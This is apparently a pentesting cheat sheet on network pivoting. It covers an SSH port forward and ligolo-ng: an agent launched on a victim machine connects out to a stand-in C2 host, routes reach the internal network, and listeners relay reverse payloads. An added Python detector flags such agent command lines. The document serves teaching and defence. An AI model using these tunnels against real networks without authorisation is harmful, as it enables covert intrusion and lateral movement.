SSH
ssh -L 8080:127.0.0.1:8080 acuity@203.0.113.50 # Local port forward: local port 8080 -> port 8080 on the SSH server
ligolo-ng
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificates
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session command to select the agent.
ligolo-ng » session
Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
netsh int ipv4 show interfaces
Idx Mét MTU État Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy
[Agent : nchatelain@nworkstation] » start_tunnel
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy:
When a connection is made on TCP port 1234 of the agent, nc will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:
[Agent : nchatelain@nworkstation] » listener_list
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                              │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
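Defender-side view of the agent command lines shown above, as an added example (not code from the original page or from the ligolo-ng project): a Python scorer for process-creation events that keys on the argument shape this page documents (-connect host:port, the default port 11601, the --socks options) rather than on the binary name. The sample events, weights, threshold, and the acceptance of one- or two-dash and -flag=value spellings are assumptions.

```python
import re

DEFAULT_PORT = 11601  # ligolo-ng proxy default port, as stated on this page
SOCKS_FLAGS = {"socks", "socks-user", "socks-pass"}  # agent options named on this page
HOSTPORT = re.compile(r"^[\w.\-]+:(\d{1,5})$")

def parse_flags(argv):
    """Map flag name -> value for '-f v', '--f v' and '-f=v' spellings."""
    flags = {}
    for i, arg in enumerate(argv):
        if arg.startswith("-"):
            name, sep, value = arg.lstrip("-").partition("=")
            if not sep and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
                value = argv[i + 1]
            flags[name] = value
    return flags

def score(cmdline):
    """Score one command line by argument shape; returns (score, reasons)."""
    argv = cmdline.split()
    flags = parse_flags(argv[1:])
    m = HOSTPORT.match(flags.get("connect", ""))
    if not m:
        return 0, []
    exe = re.split(r"[\\/]", argv[0])[-1].lower()
    checks = [  # (weight, reason, matched); weights are assumptions
        (1, "-connect host:port", True),
        (2, "default port 11601", int(m.group(1)) == DEFAULT_PORT),
        (1, "SOCKS options", bool(SOCKS_FLAGS.intersection(flags))),
        (1, "binary named agent", exe in ("agent", "agent.exe")),
    ]
    hits = [(w, r) for w, r, ok in checks if ok]
    return sum(w for w, _ in hits), [r for _, r in hits]

def detect(events, threshold=2):
    """events: iterable of (host, cmdline); returns flagged (host, score, reasons)."""
    scored = ((host, *score(cmd)) for host, cmd in events)
    return [(h, s, why) for h, s, why in scored if s >= threshold]

SAMPLE = [  # constructed process-creation events, not real telemetry
    ("ws01", "./agent -connect attacker_c2_server.com:11601"),
    ("ws02", "/tmp/upd -connect=198.51.100.7:11601"),  # renamed binary
    ("ws03", "/opt/svc -connect relay.example:8443 --socks 10.0.0.5:1080"),
    ("ws04", "openssl s_client -connect example.org:443"),  # benign look-alike
    ("ws05", "/tmp/upd -connect relay.example:8443"),  # scores 1: needs network data
]

if __name__ == "__main__":
    for host, s, why in detect(SAMPLE):
        print(host, s, "; ".join(why))
```

The ws05 case (renamed binary, non-default port, no SOCKS options) stays below the threshold, so command-line matching should be paired with egress and listening-socket telemetry.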